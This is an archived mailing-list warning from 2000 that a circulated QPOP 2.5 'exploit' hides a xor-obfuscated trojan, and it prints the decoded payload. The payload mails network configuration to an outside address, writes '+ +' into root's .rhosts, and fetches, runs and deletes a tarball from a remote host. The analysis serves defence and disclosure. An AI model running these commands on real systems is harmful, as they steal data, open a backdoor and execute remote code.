Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

TROJAN WARNING: Re: QPOP2.5* exploit ??

From: nic () BELLAMY CO NZ (Nic Bellamy)
Date: Mon, 15 May 2000 11:13:50 +1200

The "shellcode" in this is a trojan - it is self modifying (a simple xor)
to obfusticate the real intention of the program, which is to run this
code via "/bin/sh -c" on the local machine (reformatted for readability):

  /sbin/ifconfig -a | mail -s solwar etcownz () hotmail com >> /dev/null
  echo '+ +' >> ~root/.rhosts
  rcp lp () skinner trdlnk com:/usr/spool/lp/model/solwar.tar solwar.tar
  tar -xvf solwar* >> /dev/null
  cd solwar
  chmod +x solwar.sh
  ./solwar.sh >> /dev/null
  cd ..
  rm -rf solwar*

The "lp () skinner trdlnk com:/usr/spool/lp/model/solwar.tar" file does not
appear to exist, so please don't flood their server trying to get it.

Regards,
        Nic.

-- Nic Bellamy <nic () bellamy co nz>
   Director, Bellamy Consulting Ltd.
Previous By Date Next
Previous By Thread Next

Current thread: